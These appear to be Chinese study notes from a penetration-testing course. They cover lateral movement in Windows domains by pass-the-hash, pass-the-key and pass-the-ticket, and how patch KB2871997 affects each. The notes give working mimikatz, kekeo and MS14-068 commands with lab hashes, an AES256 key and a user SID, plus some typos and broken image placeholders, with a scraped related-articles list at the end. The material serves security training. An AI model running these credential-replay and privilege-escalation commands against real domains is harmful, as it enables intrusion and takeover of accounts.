内网渗透-PTHPTTPTK
内网渗透-PTH&PTT&PTK
!–看小迪老师课程自己做的笔记
!–之前gitee图床出问题了,部分图片实在找不到了,想深入研究可以去看小迪老师课程
一、kerberos协议具体工作方法
1、客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为秘钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT
2、将TGT进行加密签名返回给客户机,只有域用户(krbtgt)才能读取kerberos中的TGT数据
3、客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测
4、检测成功后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。
PTH:利用lM或者NTLM的值进行的渗透测试
PTT:利用票据凭证TGT进行的渗透测试
PTK:利用ekeys aes256进行的渗透测试
总结:KB2871997的影响
PTH:没打补丁前任意用户都可以连接,打了补丁只能使用administrator连接
PTK:打了补丁才能任意用户连接,采用aes256连接
PTT:ptt攻击不是简单的NTLM认证了,他是利用kerberos协议进行攻击。MS14-068攻击,允许域内任何一个普通用户,将自己的权限提升至域管理员权限。
二、使用PTH域横向移动---->Mimikatz (未打补丁KB2871997)
注意:当禁用了NTLM认证,psexec、smbexec等无法利用NTLM hash远程连接,但是使用mimikatz依然可以攻击成功。
PTH-ntlm传递(未打补丁KB2871997)
域管理员连接
sekurlsa::pth /user:administrator /domain:ghy /ntlm:d4a1605da045ea9ea9873e349dabbbfe
#弹出的cmd窗口执行
dir \\计算机名\c$
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FB7rMpTW-1666783160176)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706193041187.png)]
域普通用户连接
sekurlsa::pth /user:websec /domain:ghy /ntlm:0778dc8266297ac5062bfa47156499c9
#弹出的窗口执行
dir \\DC.ghy.com\c$
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IXKXtbmP-1666783160176)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706195918045.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dq6to8Xh-1666783160177)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706195937233.png)]
工作组连接
sekurlsa::pth /user:administrator /domain:WORKGROUP /ntlm:0778dc8266297ac5062bfa47156499c9
#弹出窗口执行
dir \\192.168.139.131\c$
dir \\webserver.ghy.com\c$
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3MntCZ7Q-1666783160178)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706200523112.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cJJuN62H-1666783160178)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706200543281.png)]
三、使用PTK域横向移动---->Mimikatz(打补丁KB2871997)
pth ntlm administrator传递
sekurlsa::pth /user:administrator /domain:ghy /ntlm:d4a1605da045ea9ea9873e349dabbbfe
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yddOSHd6-1666783160180)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706204208356.png)]
ptk aes256 传递
#aes256 获取
sekurlsa::ekeys
sekurlsa::pth /user:websec /domain:ghy /aes256:d61a2e608802a77332b4d98923052b0182e2592e28039d756dc402a12f09a8a9
ptt 票证传递
kist 查看票证
kist /purge 清除票证
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pMqK5PKP-1666783160180)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708194802306.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fHO59tcI-1666783160181)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708194927815.png)]
whoami /user 查看用户sid
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SBCI8Wkf-1666783160181)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708195020452.png)]
1、利用MS14-068漏洞,实现普通用户直接获取域控system权限
mimikatz # kerberos::purge 清除当前机器中的凭证
mimikatz # ketberos::list 查看当前机器凭证
ms14-068.exe -u websec@ghy.com -s S-1-5-21-3451611406-1810481340-3913844723-1105 -d 192.168.139.131 -p ghy.00925 生成TGT数据
mimikatz # kerberos::ptc 票据文件 将票据注入内存中
2、利用kekeo
kekeo "tgt::ask" /user:websec /domain:ghy.com /ntlm:0778dc8266297ac5062bfa47156499c9生成票据
kerberos::ptt 票据文件@ghy.com.kirbi 导入数据
内网渗透-PTHPTTPTK相关推荐
- 5.内网渗透之PTHPTTPTK
---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...
- kali扫描内网ip_来,我们聊聊内网渗透!
文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...
- [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案)
[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) 参考文章: (1)[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) (2)https://www.cnblogs.co ...
- 红蓝对抗 linux内网渗透
目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...
- 内网渗透测试:NTLM Relay攻击分析
目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...
- 内网渗透测试:内网信息收集与上传下载
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...
- 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...
1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...
- 【内网渗透工具】炫彩蛇安装教程
点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...
- 【内网渗透】利用非常规手段突破安全策略上线CS
前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...
最新文章
- 使用VC 2010制作和使用静态库
- 25、Java Swing文本编辑器的实现
- Android开发之自定义ImageView圆角图片的方法
- eclipse 与 tomcat 的那些路径
- JavaScript-引入JavaScript
- ArchLinux学习之环境变量
- 从“她经济”到“TA经济“——美妆行业营销报告
- C#LeetCode刷题之#933-最近的请求次数(Number of Recent Calls)
- docker cp :用于容器与主机之间的数据拷贝
- c#划分目录和文件(小白的一点经验)
- ASP.NET MVC5+EF6+EasyUI 后台管理系统(27)-权限管理系统-分配用户给角色
- 零基础怎么开启编程之路 -(第1期)
- day01--课后练习
- maven命令-P 参数引发的思考
- centos ping 路由_centos服务器怎么ping 命令
- 计算机网络--使用网络协议分析器捕捉和分析协议数据包
- 【产品】 产品设计之结构设计:注塑件产生气纹的原因
- EXCEL透视后 调整列的顺序 如:1月 2月 3月 手动调整顺序
- iphon13是双卡双待吗 苹果13是5g吗
- 了解 TCP 系统调用序列